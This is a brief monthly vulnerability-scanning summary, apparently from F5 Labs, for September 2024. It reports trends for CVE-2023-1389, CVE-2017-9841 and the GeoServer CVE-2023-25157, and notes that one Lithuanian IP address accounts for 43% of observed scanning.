Continued Intense Scanning From One IP in Lithuania

Welcome to the September 2024 installment of the Sensor Intelligence Series (SIS), our monthly summary of vulnerability intelligence based on distributed passive sensor data.

Below are a few key takeaways from this month’s summary.

• Scanning for CVE-2017-9841 dropped by 10% (vs. August).
• CVE-2023-1389 continues to be the most scanned CVE we track, with a 400% increase over August.
• One IP address continues to be the most observed, accounting for 43% of overall scanning traffic observed.
• We see a spike in the scanning of CVE-2023-25157, a Critical vulnerability in the GeoServer software project.

CVE Scanning

Following on from our last month’s analysis, the scanning of CVE-2017-9841 has decreased by 10% compared to August and is down 99.8% from its high-water mark in June of 2024, and nearly vanishing from our visualizations.

CVE-2023-1389, an RCE vulnerability in TP-Link Archer AX21 routers, has been the most scanned CVE for the last two months, increasing 400% over August. While this sort of swing in volume may seem remarkable, as we have noticed before, it’s not unusual when we analyze the shape of the scanning for a particular CVE over time.

Following Up on an Aberration

Last month, a pattern of scanning activity was identified coming from a specific IPv4 address (141.98.11.114), which was suspected to be the BotPoke scanner. Despite a slight decrease in scanning traffic, this IP continued to target the same URIs and regions where our sensors are located, accounting for 43% of the overall scanning traffic observed.

A Brief Note on Malware Stagers Observed

Our passive sensors, which do not respond to traffic, limit our ability to predict secondary actions after successful exploitation. However, we can show that some CVEs are attempted to be used and downloaded malware stagers.

To view an example of the most common URL observed in September attempting to exploit CVE-2023-1389 visit F5 Labs to read the full summary.

September Vulnerabilities by the Numbers

Figure 1 shows September attack traffic for the top ten CVEs, with CVE-2023-1389 dominating. Increased scanning for this vulnerability throws off the proportionality of this view. However, see the logarithmic scale (figure 3) for an easier view.

Figure 2 shows a significant increase in scanning for CVE-2023-1389 over the past year, while a decline in scanning for CVE-2017-9841 persists.

Long-Term Trends

Figure 3 shows the traffic for the top 19 CVEs, with CVE-2017-8941 and CVE-2023-1389 showing significant increases. The average of the other 110 CVEs has fallen dramatically. CVE-2023-25157, a critical vulnerability in the GeoServer software project, has seen a dramatic increase in scanning. The log scale helps show changes in other top 10 scanned CVEs.

To find out more about September’s CVEs and for recommendations on how to stay ahead of the curve in cybersecurity, check out the full article here.

We’ll see you next month!